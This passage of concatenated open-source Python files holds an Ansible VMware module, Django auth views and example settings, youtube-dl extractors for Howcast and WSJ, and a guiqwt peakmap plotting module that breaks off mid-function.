        host_network_system = self.host_system.configManager.networkSystem
        dv_switch = find_dvs_by_name(self.content, self.migrate_switch_name)
        pg = find_dvspg_by_name(dv_switch, self.migrate_portgroup_name)
        config = vim.host.NetworkConfig()
        config.portgroup = [self.create_port_group_config()]
        config.vnic = [self.create_host_vnic_config(dv_switch.uuid, pg.key)]
        host_network_system.UpdateNetworkConfig(config, "modify")
        self.module.exit_json(changed=True)
    def check_vmk_current_state(self):
        """Return the state key describing where the configured VMK device
        currently lives ('migrate_vss_vds', 'migrate_vds_vss' or 'migrated')."""
        self.host_system = find_hostsystem_by_name(self.content, self.esxi_hostname)
        # NOTE(review): if no branch below matches, this returns None and
        # process_state() fails via its generic Exception handler (KeyError)
        # -- confirm this fall-through is intended.
        for vnic in self.host_system.configManager.networkSystem.networkInfo.vnic:
            if vnic.device == self.device:
                # self.vnic = vnic
                if vnic.spec.distributedVirtualPort is None:
                    # no DVS port connection -> VMK sits on a standard switch
                    if vnic.portgroup == self.current_portgroup_name:
                        return "migrate_vss_vds"
                else:
                    dvs = find_dvs_by_name(self.content, self.current_switch_name)
                    if dvs is None:
                        return "migrated"
                    if vnic.spec.distributedVirtualPort.switchUuid == dvs.uuid:
                        return "migrate_vds_vss"
def main():
    """Entry point: build the argument spec, validate inputs and run the
    VMK migration state machine."""
    spec = vmware_argument_spec()
    spec.update(dict(
        esxi_hostname=dict(required=True, type='str'),
        device=dict(required=True, type='str'),
        current_switch_name=dict(required=True, type='str'),
        current_portgroup_name=dict(required=True, type='str'),
        migrate_switch_name=dict(required=True, type='str'),
        migrate_portgroup_name=dict(required=True, type='str'),
    ))
    module = AnsibleModule(argument_spec=spec, supports_check_mode=False)
    if not HAS_PYVMOMI:
        module.fail_json(msg='pyvmomi required for this module')
    VMwareMigrateVmk(module).process_state()


if __name__ == '__main__':
    main()
| gpl-3.0 |
MCMic/Sick-Beard | lib/subliminal/exceptions.py | 170 | 1050 | # -*- coding: utf-8 -*-
# Copyright 2011-2012 Antoine Bertin <diaoulael@gmail.com>
#
# This file is part of subliminal.
#
# subliminal is free software; you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# subliminal is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with subliminal. If not, see <http://www.gnu.org/licenses/>.
class Error(Exception):
    """Base class for all exceptions raised by subliminal."""
class ServiceError(Error):
    """Exception raised by services"""
    pass
class DownloadFailedError(Error):
    """Exception raised when a download task has failed in service"""
    pass
| gpl-3.0 |
benjaminjkraft/django | django/contrib/auth/views.py | 10 | 11936 | import functools
import warnings
from django.conf import settings
# Avoid shadowing the login() and logout() views below.
from django.contrib.auth import (
REDIRECT_FIELD_NAME, get_user_model, login as auth_login,
logout as auth_logout, update_session_auth_hash,
)
from django.contrib.auth.decorators import login_required
from django.contrib.auth.forms import (
AuthenticationForm, PasswordChangeForm, PasswordResetForm, SetPasswordForm,
)
from django.contrib.auth.tokens import default_token_generator
from django.contrib.sites.shortcuts import get_current_site
from django.http import HttpResponseRedirect, QueryDict
from django.shortcuts import resolve_url
from django.template.response import TemplateResponse
from django.urls import reverse
from django.utils.deprecation import RemovedInDjango20Warning
from django.utils.encoding import force_text
from django.utils.http import is_safe_url, urlsafe_base64_decode
from django.utils.six.moves.urllib.parse import urlparse, urlunparse
from django.utils.translation import ugettext as _
from django.views.decorators.cache import never_cache
from django.views.decorators.csrf import csrf_protect
from django.views.decorators.debug import sensitive_post_parameters
def deprecate_current_app(func):
    """
    Wrap a view so a legacy ``current_app`` keyword argument is still
    accepted (with a deprecation warning) and transferred onto the request.
    """
    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        # Fast path: modern callers never pass current_app.
        if 'current_app' not in kwargs:
            return func(*args, **kwargs)
        warnings.warn(
            "Passing `current_app` as a keyword argument is deprecated. "
            "Instead the caller of `{0}` should set "
            "`request.current_app`.".format(func.__name__),
            RemovedInDjango20Warning
        )
        current_app = kwargs.pop('current_app')
        request = kwargs.get('request', None)
        if request and current_app is not None:
            request.current_app = current_app
        return func(*args, **kwargs)
    return wrapper
@deprecate_current_app
@sensitive_post_parameters()
@csrf_protect
@never_cache
def login(request, template_name='registration/login.html',
          redirect_field_name=REDIRECT_FIELD_NAME,
          authentication_form=AuthenticationForm,
          extra_context=None):
    """
    Display the login form and handle the login action.
    """
    redirect_to = request.POST.get(redirect_field_name,
                                   request.GET.get(redirect_field_name, ''))

    if request.method != "POST":
        form = authentication_form(request)
    else:
        form = authentication_form(request, data=request.POST)
        if form.is_valid():
            # Reject user-supplied redirect targets pointing off-site.
            if not is_safe_url(url=redirect_to, host=request.get_host()):
                redirect_to = resolve_url(settings.LOGIN_REDIRECT_URL)
            # Security check complete. Log the user in.
            auth_login(request, form.get_user())
            return HttpResponseRedirect(redirect_to)

    current_site = get_current_site(request)
    context = {
        'form': form,
        redirect_field_name: redirect_to,
        'site': current_site,
        'site_name': current_site.name,
    }
    if extra_context is not None:
        context.update(extra_context)
    return TemplateResponse(request, template_name, context)
@deprecate_current_app
@never_cache
def logout(request, next_page=None,
           template_name='registration/logged_out.html',
           redirect_field_name=REDIRECT_FIELD_NAME,
           extra_context=None):
    """
    Log the user out, then either redirect or render the logged-out page.
    """
    auth_logout(request)

    if next_page is not None:
        next_page = resolve_url(next_page)

    requested = (redirect_field_name in request.POST or
                 redirect_field_name in request.GET)
    if requested:
        next_page = request.POST.get(redirect_field_name,
                                     request.GET.get(redirect_field_name))
        # Security check -- don't allow redirection to a different host.
        if not is_safe_url(url=next_page, host=request.get_host()):
            next_page = request.path

    if next_page:
        # Redirect to this page until the session has been cleared.
        return HttpResponseRedirect(next_page)

    current_site = get_current_site(request)
    context = {
        'site': current_site,
        'site_name': current_site.name,
        'title': _('Logged out'),
    }
    if extra_context is not None:
        context.update(extra_context)
    return TemplateResponse(request, template_name, context)
@deprecate_current_app
def logout_then_login(request, login_url=None, extra_context=None):
    """
    Log out the user if they are logged in, then redirect to the log-in page.
    """
    target = resolve_url(login_url or settings.LOGIN_URL)
    return logout(request, target, extra_context=extra_context)
def redirect_to_login(next, login_url=None,
                      redirect_field_name=REDIRECT_FIELD_NAME):
    """
    Redirect the user to the login page, passing the given 'next' page.
    """
    parts = list(urlparse(resolve_url(login_url or settings.LOGIN_URL)))
    if redirect_field_name:
        # Inject the 'next' target into the login URL's query string.
        querystring = QueryDict(parts[4], mutable=True)
        querystring[redirect_field_name] = next
        parts[4] = querystring.urlencode(safe='/')
    return HttpResponseRedirect(urlunparse(parts))
# 4 views for password reset:
# - password_reset sends the mail
# - password_reset_done shows a success message for the above
# - password_reset_confirm checks the link the user clicked and
# prompts for a new password
# - password_reset_complete shows a success message for the above
@deprecate_current_app
@csrf_protect
def password_reset(request,
                   template_name='registration/password_reset_form.html',
                   email_template_name='registration/password_reset_email.html',
                   subject_template_name='registration/password_reset_subject.txt',
                   password_reset_form=PasswordResetForm,
                   token_generator=default_token_generator,
                   post_reset_redirect=None,
                   from_email=None,
                   extra_context=None,
                   html_email_template_name=None,
                   extra_email_context=None):
    """
    Display the password-reset form and send the reset e-mail on success.
    """
    if post_reset_redirect is None:
        post_reset_redirect = reverse('password_reset_done')
    else:
        post_reset_redirect = resolve_url(post_reset_redirect)

    if request.method == "POST":
        form = password_reset_form(request.POST)
        if form.is_valid():
            # Hand everything the form needs to render and send the e-mail.
            form.save(
                use_https=request.is_secure(),
                token_generator=token_generator,
                from_email=from_email,
                email_template_name=email_template_name,
                subject_template_name=subject_template_name,
                request=request,
                html_email_template_name=html_email_template_name,
                extra_email_context=extra_email_context,
            )
            return HttpResponseRedirect(post_reset_redirect)
    else:
        form = password_reset_form()

    context = {
        'form': form,
        'title': _('Password reset'),
    }
    if extra_context is not None:
        context.update(extra_context)
    return TemplateResponse(request, template_name, context)
@deprecate_current_app
def password_reset_done(request,
                        template_name='registration/password_reset_done.html',
                        extra_context=None):
    """Render the 'reset e-mail sent' confirmation page."""
    context = {'title': _('Password reset sent')}
    if extra_context is not None:
        context.update(extra_context)
    return TemplateResponse(request, template_name, context)
# Doesn't need csrf_protect since no-one can guess the URL
@sensitive_post_parameters()
@never_cache
@deprecate_current_app
def password_reset_confirm(request, uidb64=None, token=None,
                           template_name='registration/password_reset_confirm.html',
                           token_generator=default_token_generator,
                           set_password_form=SetPasswordForm,
                           post_reset_redirect=None,
                           extra_context=None):
    """
    Check the hash in a password reset link and present a form for
    entering a new password.
    """
    UserModel = get_user_model()
    assert uidb64 is not None and token is not None  # checked by URLconf
    if post_reset_redirect is None:
        post_reset_redirect = reverse('password_reset_complete')
    else:
        post_reset_redirect = resolve_url(post_reset_redirect)

    try:
        # urlsafe_base64_decode() decodes to bytestring on Python 3
        uid = force_text(urlsafe_base64_decode(uidb64))
        user = UserModel._default_manager.get(pk=uid)
    except (TypeError, ValueError, OverflowError, UserModel.DoesNotExist):
        user = None

    validlink = user is not None and token_generator.check_token(user, token)
    if validlink:
        title = _('Enter new password')
        if request.method == 'POST':
            form = set_password_form(user, request.POST)
            if form.is_valid():
                form.save()
                return HttpResponseRedirect(post_reset_redirect)
        else:
            form = set_password_form(user)
    else:
        # Invalid or expired link: render the failure page without a form.
        form = None
        title = _('Password reset unsuccessful')

    context = {
        'form': form,
        'title': title,
        'validlink': validlink,
    }
    if extra_context is not None:
        context.update(extra_context)
    return TemplateResponse(request, template_name, context)
@deprecate_current_app
def password_reset_complete(request,
                            template_name='registration/password_reset_complete.html',
                            extra_context=None):
    """Render the final 'password reset complete' page with a login link."""
    context = {
        'login_url': resolve_url(settings.LOGIN_URL),
        'title': _('Password reset complete'),
    }
    if extra_context is not None:
        context.update(extra_context)
    return TemplateResponse(request, template_name, context)
@sensitive_post_parameters()
@csrf_protect
@login_required
@deprecate_current_app
def password_change(request,
                    template_name='registration/password_change_form.html',
                    post_change_redirect=None,
                    password_change_form=PasswordChangeForm,
                    extra_context=None):
    """Let a logged-in user change their password."""
    if post_change_redirect is None:
        post_change_redirect = reverse('password_change_done')
    else:
        post_change_redirect = resolve_url(post_change_redirect)

    if request.method != "POST":
        form = password_change_form(user=request.user)
    else:
        form = password_change_form(user=request.user, data=request.POST)
        if form.is_valid():
            form.save()
            # Updating the password logs out all other sessions for the user
            # except the current one.
            update_session_auth_hash(request, form.user)
            return HttpResponseRedirect(post_change_redirect)

    context = {
        'form': form,
        'title': _('Password change'),
    }
    if extra_context is not None:
        context.update(extra_context)
    return TemplateResponse(request, template_name, context)
@login_required
@deprecate_current_app
def password_change_done(request,
                         template_name='registration/password_change_done.html',
                         extra_context=None):
    """Render the 'password change successful' page."""
    context = {'title': _('Password change successful')}
    if extra_context is not None:
        context.update(extra_context)
    return TemplateResponse(request, template_name, context)
| bsd-3-clause |
MarkTheF4rth/youtube-dl | youtube_dl/extractor/howcast.py | 95 | 1336 | from __future__ import unicode_literals
from .common import InfoExtractor
from ..utils import parse_iso8601
class HowcastIE(InfoExtractor):
    """Extractor for howcast.com video pages.

    The media itself is hosted on Ooyala; this extractor only scrapes the
    Ooyala embed code and publication time from the page and delegates
    playback via a 'url_transparent' result.
    """
    _VALID_URL = r'https?://(?:www\.)?howcast\.com/videos/(?P<id>\d+)'
    _TEST = {
        'url': 'http://www.howcast.com/videos/390161-How-to-Tie-a-Square-Knot-Properly',
        'md5': '8b743df908c42f60cf6496586c7f12c3',
        'info_dict': {
            'id': '390161',
            'ext': 'mp4',
            'title': 'How to Tie a Square Knot Properly',
            'description': 'md5:dbe792e5f6f1489027027bf2eba188a3',
            'timestamp': 1276081287,
            'upload_date': '20100609',
        },
        'params': {
            # m3u8 download
            'skip_download': True,
        },
    }
    def _real_extract(self, url):
        # Fetch the page, pull the Ooyala embed code out of the iframe URL
        # and hand off to the Ooyala extractor.
        video_id = self._match_id(url)
        webpage = self._download_webpage(url, video_id)
        embed_code = self._search_regex(
            r'<iframe[^>]+src="[^"]+\bembed_code=([^\b]+)\b',
            webpage, 'ooyala embed code')
        return {
            '_type': 'url_transparent',
            'ie_key': 'Ooyala',
            'url': 'ooyala:%s' % embed_code,
            'id': video_id,
            # publication time taken from the page's OpenGraph metadata
            'timestamp': parse_iso8601(self._html_search_meta(
                'article:published_time', webpage, 'timestamp')),
        }
| unlicense |
sbunatyan/tavrida | examples/django/hello_world/settings.py | 1 | 2392 | """
Django settings for hello_world project.
Generated by 'django-admin startproject' using Django 1.8.5.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
# Project root: two directory levels above this settings module.
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '7cv!&bfbwov!b-yq7rf$i$+lok62e==ozhf2c7-1d-if!0g*d9'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
    'django.contrib.contenttypes',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'my_app',
)
MIDDLEWARE_CLASSES = (
    'django.middleware.common.CommonMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
    'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'hello_world.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'hello_world.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
# NOTE(review): TEMPLATE_DIRS is the pre-Django-1.8 setting superseded by
# TEMPLATES[0]['DIRS'] above; presumably kept for legacy code -- confirm
# it is still needed.
TEMPLATE_DIRS = (
    os.path.join(BASE_DIR, ''),
)
| apache-2.0 |
pim89/youtube-dl | youtube_dl/extractor/wsj.py | 15 | 3206 | # coding: utf-8
from __future__ import unicode_literals
from .common import InfoExtractor
from ..utils import (
int_or_none,
float_or_none,
unified_strdate,
)
class WSJIE(InfoExtractor):
    """Wall Street Journal video extractor, backed by the WSJ video API."""
    _VALID_URL = r'''(?x)https?://
                        (?:
                            video-api\.wsj\.com/api-video/player/iframe\.html\?guid=|
                            (?:www\.)?wsj\.com/video/[^/]+/
                        )
                        (?P<id>[a-zA-Z0-9-]+)'''
    IE_DESC = 'Wall Street Journal'
    _TESTS = [{
        'url': 'http://video-api.wsj.com/api-video/player/iframe.html?guid=1BD01A4C-BFE8-40A5-A42F-8A8AF9898B1A',
        'md5': 'e230a5bb249075e40793b655a54a02e4',
        'info_dict': {
            'id': '1BD01A4C-BFE8-40A5-A42F-8A8AF9898B1A',
            'ext': 'mp4',
            'upload_date': '20150202',
            'uploader_id': 'jdesai',
            'creator': 'jdesai',
            'categories': list,  # a long list
            'duration': 90,
            'title': 'Bills Coach Rex Ryan Updates His Old Jets Tattoo',
        },
    }, {
        'url': 'http://www.wsj.com/video/can-alphabet-build-a-smarter-city/359DDAA8-9AC1-489C-82E6-0429C1E430E0.html',
        'only_matching': True,
    }]

    def _real_extract(self, url):
        """Query the WSJ video API for metadata and assemble the format list."""
        video_id = self._match_id(url)

        api_url = (
            'http://video-api.wsj.com/api-video/find_all_videos.asp?'
            'type=guid&count=1&query=%s&fields=type,hls,videoMP4List,'
            'thumbnailList,author,description,name,duration,videoURL,'
            'titletag,formattedCreationDate,keywords,editor' % video_id)
        video = self._download_json(api_url, video_id)['items'][0]
        title = video.get('name', video.get('titletag'))

        formats = []

        # HDS (f4m) stream, when available
        f4m_url = video.get('videoURL')
        if f4m_url:
            formats.extend(self._extract_f4m_formats(
                f4m_url, video_id, f4m_id='hds', fatal=False))

        # HLS stream, when available
        m3u8_url = video.get('hls')
        if m3u8_url:
            formats.extend(self._extract_m3u8_formats(
                video['hls'], video_id, ext='mp4',
                entry_protocol='m3u8_native', m3u8_id='hls', fatal=False))

        # progressive MP4 variants
        for variant in video.get('videoMP4List', []):
            mp4_url = variant.get('url')
            if not mp4_url:
                continue
            tbr = int_or_none(variant.get('bitrate'))
            formats.append({
                'url': mp4_url,
                'format_id': 'http' + ('-%d' % tbr if tbr else ''),
                'tbr': tbr,
                'width': int_or_none(variant.get('width')),
                'height': int_or_none(variant.get('height')),
                'fps': float_or_none(variant.get('fps')),
            })
        self._sort_formats(formats)

        return {
            'id': video_id,
            'formats': formats,
            # Thumbnails are conveniently in the correct format already
            'thumbnails': video.get('thumbnailList'),
            'creator': video.get('author'),
            'uploader_id': video.get('editor'),
            'duration': int_or_none(video.get('duration')),
            'upload_date': unified_strdate(video.get(
                'formattedCreationDate'), day_first=False),
            'title': title,
            'categories': video.get('keywords'),
        }
| unlicense |
uweschmitt/ivi | ivi/gui/peakmapplotter.py | 1 | 35955 | # -*- coding: utf-8 -*-
import types
import numpy as np
from PyQt4.QtGui import (QDialog, QGridLayout, QSlider, QLabel, QCheckBox, QWidget,
QLineEdit, QFrame, QSizePolicy, QHBoxLayout, QPushButton, QMenuBar,
QAction, QMenu, QKeySequence, QVBoxLayout, QFileDialog, QPixmap, QPainter,
QTableWidget, QPen, QBrush, QColor, QPolygonF, QTransform,
QTableWidgetItem, QSplitter, QHeaderView, QSpacerItem, QTextDocument)
from PyQt4.QtCore import (Qt, SIGNAL, QRectF, QPointF, pyqtSignal)
from PyQt4.QtWebKit import (QWebView, QWebSettings)
from PyQt4.Qwt5 import (QwtScaleDraw, QwtText)
import guidata
from guiqwt.builder import make
from guiqwt.config import CONF
from guiqwt.events import (KeyEventMatch, QtDragHandler, PanHandler, MoveHandler, ZoomHandler,)
from guiqwt.interfaces import IBasePlotItem, IShapeItemType
from guiqwt.image import ImagePlot, RawImageItem
from guiqwt.label import ObjectInfo
from guiqwt.plot import ImageWidget
from guiqwt.shapes import RectangleShape, AbstractShape, QwtPlotItem
from guiqwt.signals import (SIG_MOVE, SIG_START_TRACKING, SIG_STOP_NOT_MOVING, SIG_STOP_MOVING,
SIG_PLOT_AXIS_CHANGED, )
from guiqwt.tools import SelectTool, InteractiveTool
from guiqwt.transitional import QwtSymbol
from helpers import protect_signal_handler
from ..lib.data_structures import Feature, PeakRange, PeakMap
from utils import set_x_axis_scale_draw, set_y_axis_scale_draw
from lru_cache import lru_cache
class PeakMapImageBase(object):
    """Shared logic for rendering one or more PeakMaps as an intensity image.

    Tracks the overall rt/mz/intensity ranges of the given peakmaps and
    renders cached uint8 images for arbitrary rt/mz windows, applying the
    configured intensity window, optional log scaling and gamma correction.
    """

    def __init__(self, peakmaps):
        self.peakmaps = peakmaps
        # empty peakmaps contribute no ranges:
        ranges = [pm.get_ranges() for pm in peakmaps if len(pm)]
        if ranges:  # list might be empty
            rtmins, rtmaxs, mzmins, mzmaxs, iimins, iimaxs = zip(*ranges)
            self.rtmin = min(rtmins)
            self.rtmax = max(rtmaxs)
            self.mzmin = min(mzmins)
            self.mzmax = max(mzmaxs)
            self.imax = max(iimaxs)
        else:
            self.rtmin = self.rtmax = self.mzmin = self.mzmax = self.imax = 0.0
        self.bounds = QRectF(QPointF(self.rtmin, self.mzmin), QPointF(self.rtmax, self.mzmax))
        self.imin = 0.0
        self.upper_limit_imax = self.imax
        self.gamma = 1.0
        self.log_scale = 1
        self.cached_matrix = None

    def get_peakmap_bounds(self):
        """Return the overall (rtmin, rtmax, mzmin, mzmax) of all peakmaps."""
        return self.rtmin, self.rtmax, self.mzmin, self.mzmax

    def set_processing_parameters(self, parameters):
        """Apply gamma / log-scale / intensity window from a parameter object."""
        self.set_gamma(parameters.gamma)
        self.set_logarithmic_scale(parameters.log_scale)
        self.set_imin(parameters.imin)
        self.set_imax(parameters.imax)

    def set_gamma(self, gamma):
        self.gamma = gamma

    def set_logarithmic_scale(self, log_scale):
        self.log_scale = log_scale

    def set_imin(self, imin):
        self.imin = imin

    def set_imax(self, imax):
        self.imax = imax

    def get_gamma(self):
        # bug fix: previously returned the misspelled, never-assigned
        # attribute 'self.gama', which always raised AttributeError.
        return self.gamma

    @lru_cache(maxsize=100)
    # NX = 400, NX = 300 -> per image 300 * 400 * 1 byte = 12e4 bytes
    # 100 images in cache: 12e6 bytes = 12 mb
    def compute_image(self, idx, NX, NY, rtmin, rtmax, mzmin, mzmax):
        """Render peakmap `idx` over the given rt/mz window as an
        NX x NY uint8 intensity image with values in 0..255."""
        if rtmin >= rtmax or mzmin >= mzmax:
            # degenerate window: return a single black pixel
            smoothed = np.zeros((1, 1))
        else:
            # optimized:
            # one additional row / col as we loose one row and col during smoothing:
            #data = sample_image(self.peakmaps[idx], rtmin, rtmax, mzmin, mzmax, NX + 1, NY + 1)
            data = self.peakmaps[idx].sample_image(rtmin, rtmax, mzmin, mzmax, NX + 1, NY + 1, 1)
            # enlarge single pixels to 2 x 2 pixels:
            smoothed = data[:-1, :-1] + data[:-1, 1:] + data[1:, :-1] + data[1:, 1:]
            # turn up/down
            smoothed = smoothed[::-1, :]
        imin = self.imin
        imax = self.imax
        if self.log_scale:
            smoothed = np.log(1.0 + smoothed)
            imin = np.log(1.0 + imin)
            imax = np.log(1.0 + imax)
        # clip to the configured intensity window:
        smoothed[smoothed < imin] = imin
        smoothed[smoothed > imax] = imax
        smoothed -= imin
        # scale to 1.0
        maxd = np.max(smoothed)
        if maxd:
            smoothed /= maxd
        # apply gamma
        smoothed = smoothed ** (self.gamma) * 255
        to_plot = smoothed.astype(np.uint8)
        return to_plot
class PeakMapImageItem(PeakMapImageBase, RawImageItem):

    """ draws peakmap 2d view dynamically based on given limits """

    def __init__(self, peakmap):
        RawImageItem.__init__(self, data=np.zeros((1, 1), np.uint8))
        PeakMapImageBase.__init__(self, [peakmap])

        self.update_border()
        self.IMAX = 255
        self.set_lut_range([0, self.IMAX])
        self.set_color_map("hot")

        # drawing parameters cached from the last draw_image() call; reused
        # by paint_pixmap() to render an identical off-screen image:
        self.last_canvas_rect = None
        self.last_src_rect = None
        self.last_dst_rect = None
        self.last_xmap = None
        self.last_ymap = None

    def paint_pixmap(self, widget):
        """Render the last on-screen view into a QPixmap (e.g. for saving)."""
        assert self.last_canvas_rect is not None
        x1, y1 = self.last_canvas_rect.left(), self.last_canvas_rect.top()
        x2, y2 = self.last_canvas_rect.right(), self.last_canvas_rect.bottom()

        NX = x2 - x1
        NY = y2 - y1
        pix = QPixmap(NX, NY)
        painter = QPainter(pix)
        painter.begin(widget)
        try:
            self.draw_border(painter, self.last_xmap, self.last_ymap, self.last_canvas_rect)
            # NOTE(review): last_xmap is passed for both the xMap and yMap
            # arguments below -- looks like last_ymap was intended for the
            # second one; confirm before changing.
            self.draw_image(painter, self.last_canvas_rect, self.last_src_rect, self.last_dst_rect,
                            self.last_xmap, self.last_xmap)
            # somehow guiqwt paints a distorted border at left/top, so we remove it:
            return pix.copy(2, 2, NX - 2, NY - 2)
        finally:
            painter.end()

    #---- QwtPlotItem API ------------------------------------------------------
    def draw_image(self, painter, canvasRect, srcRect, dstRect, xMap, yMap):
        # normally we use this method indirectly from quiqwt which takes the burden of constructing
        # the right parameters. if we want to call this method manually, eg for painting on on a
        # QPixmap for saving the image, we just use the last set of parmeters passed to this
        # method, this is much easier than constructing the params seperatly, and so we get the
        # exact same result as we see on screen:
        self.last_canvas_rect = canvasRect
        self.last_src_rect = srcRect
        self.last_dst_rect = dstRect
        self.last_xmap = xMap
        self.last_ymap = yMap

        x1, y1 = canvasRect.left(), canvasRect.top()
        x2, y2 = canvasRect.right(), canvasRect.bottom()
        NX = x2 - x1
        NY = y2 - y1
        rtmin, mzmax, rtmax, mzmin = srcRect

        # recompute the (cached) image for the currently visible window:
        self.data = self.compute_image(0, NX, NY, rtmin, rtmax, mzmin, mzmax)

        # draw
        srcRect = (0, 0, NX, NY)
        x1, y1, x2, y2 = canvasRect.getCoords()
        RawImageItem.draw_image(self, painter, canvasRect, srcRect, (x1, y1, x2, y2), xMap, yMap)
class PeakmapCursorRangeInfo(ObjectInfo):
    """Formats the rt/mz range of the attached rectangle marker as HTML."""

    def __init__(self, marker):
        ObjectInfo.__init__(self)
        self.marker = marker

    def get_text(self):
        rtmin, mzmin, rtmax, mzmax = self.marker.get_rect()
        # normalize each axis only when its max coordinate is defined:
        if not np.isnan(rtmax):
            rtmin, rtmax = sorted((rtmin, rtmax))
        if not np.isnan(mzmax):
            mzmin, mzmax = sorted((mzmin, mzmax))
        if np.isnan(rtmax):
            # single point: only one rt/mz pair is available
            return """<pre>mz: %9.5f<br>rt: %6.2fm</pre>""" % (mzmin, rtmin / 60.0)
        lines = (
            "mz: %10.5f .. %10.5f (delta=%5.5f)" % (mzmin, mzmax, mzmax - mzmin),
            "rt: %6.2fm .. %6.2fm (delta=%.1fs)" % (rtmin / 60.0,
                                                    rtmax / 60.0,
                                                    rtmax - rtmin),
        )
        return "<pre>%s</pre>" % "<br>".join(lines)
class PeakmapZoomTool(InteractiveTool):
    """ selects rectangle from peakmap """
    TITLE = "Selection"
    ICON = "selection.png"
    CURSOR = Qt.CrossCursor

    def setup_filter(self, baseplot):
        """Wire keyboard and mouse handlers for selection/pan/zoom and
        return the filter's start state."""
        filter_ = baseplot.filter
        # filter initialisation
        start_state = filter_.new_state()
        # Backspace/Escape/Home: reset zoom to the full peakmap
        filter_.add_event(start_state,
                          KeyEventMatch((Qt.Key_Backspace, Qt.Key_Escape, Qt.Key_Home)),
                          baseplot.reset_zoom_to_full_map, start_state)
        # Space: reset zoom to the initial view
        filter_.add_event(start_state,
                          KeyEventMatch((Qt.Key_Space,)), baseplot.reset_zoom_to_initial_view,
                          start_state)
        # left-button drag: rectangle selection
        handler = QtDragHandler(filter_, Qt.LeftButton, start_state=start_state)
        self.connect(handler, SIG_MOVE, baseplot.move_in_drag_mode)
        self.connect(handler, SIG_START_TRACKING, baseplot.start_drag_mode)
        self.connect(handler, SIG_STOP_NOT_MOVING, baseplot.stop_drag_mode)
        self.connect(handler, SIG_STOP_MOVING, baseplot.stop_drag_mode)
        # shift + left-button drag: same selection handlers
        handler = QtDragHandler(
            filter_, Qt.LeftButton, start_state=start_state, mods=Qt.ShiftModifier)
        self.connect(handler, SIG_MOVE, baseplot.move_in_drag_mode)
        self.connect(handler, SIG_START_TRACKING, baseplot.start_drag_mode)
        self.connect(handler, SIG_STOP_NOT_MOVING, baseplot.stop_drag_mode)
        self.connect(handler, SIG_STOP_MOVING, baseplot.stop_drag_mode)
        # middle button: pan (also alt + left button)
        PanHandler(filter_, Qt.MidButton, start_state=start_state)
        PanHandler(filter_, Qt.LeftButton, mods=Qt.AltModifier, start_state=start_state)
        # AutoZoomHandler(filter_, Qt.MidButton, start_state=start_state)
        # right button: zoom (also ctrl + left button)
        ZoomHandler(filter_, Qt.RightButton, start_state=start_state)
        ZoomHandler(filter_, Qt.LeftButton, mods=Qt.ControlModifier, start_state=start_state)
        # MenuHandler(filter_, Qt.RightButton, start_state=start_state)
        # other events (keys, move)
        MoveHandler(filter_, start_state=start_state)
        MoveHandler(filter_, start_state=start_state, mods=Qt.ShiftModifier)
        MoveHandler(filter_, start_state=start_state, mods=Qt.AltModifier)
        return start_state
class ModifiedImagePlot(ImagePlot):
    """ special handlers for dragging selection, source is PeakmapZoomTool

    Zooming, panning and drag-selection are clamped to the rt/mz bounds of
    the current peakmap (``peakmap_range``).
    """

    # as this class is used for patching (an existing ImagePlot instance gets
    # its __class__ reassigned, see create_image_widget), the __init__ is
    # never called, so we set default values as class attributes:

    # current view window (rt/mz) and intensity bounds; filled in by
    # set_initial_image_limits:
    rtmin = rtmax = mzmin = mzmax = imin = imax = None
    # full data bounds (rtmin, rtmax, mzmin, mzmax, imin, imax); assigned
    # externally, see PeakmapPlotter.set_peakmaps:
    peakmap_range = (None, None, None, None, None, None)
    coords = (None, None)
    # True while a rectangle drag-selection is in progress:
    dragging = False
    chromatogram_plot = None
    mz_plot = None

    def set_initial_image_limits(self, rtmin, rtmax, mzmin, mzmax):
        """Clamp the given window to the peakmap bounds, remember it as the
        initial view (used by reset_zoom_to_initial_view) and apply it."""
        # could later be replaced by a proper view-history mechanism..
        self.rtmin = max(rtmin, self.peakmap_range[0])
        self.rtmax = min(rtmax, self.peakmap_range[1])
        self.mzmin = max(mzmin, self.peakmap_range[2])
        self.mzmax = min(mzmax, self.peakmap_range[3])
        self.update_image_limits(self.rtmin, self.rtmax, self.mzmin, self.mzmax)

    def update_image_limits(self, rtmin, rtmax, mzmin, mzmax):
        """Set the visible rt/mz window (clamped to the peakmap bounds),
        replot and notify listeners via SIG_PLOT_AXIS_CHANGED."""
        rtmin = max(rtmin, self.peakmap_range[0])
        rtmax = min(rtmax, self.peakmap_range[1])
        mzmin = max(mzmin, self.peakmap_range[2])
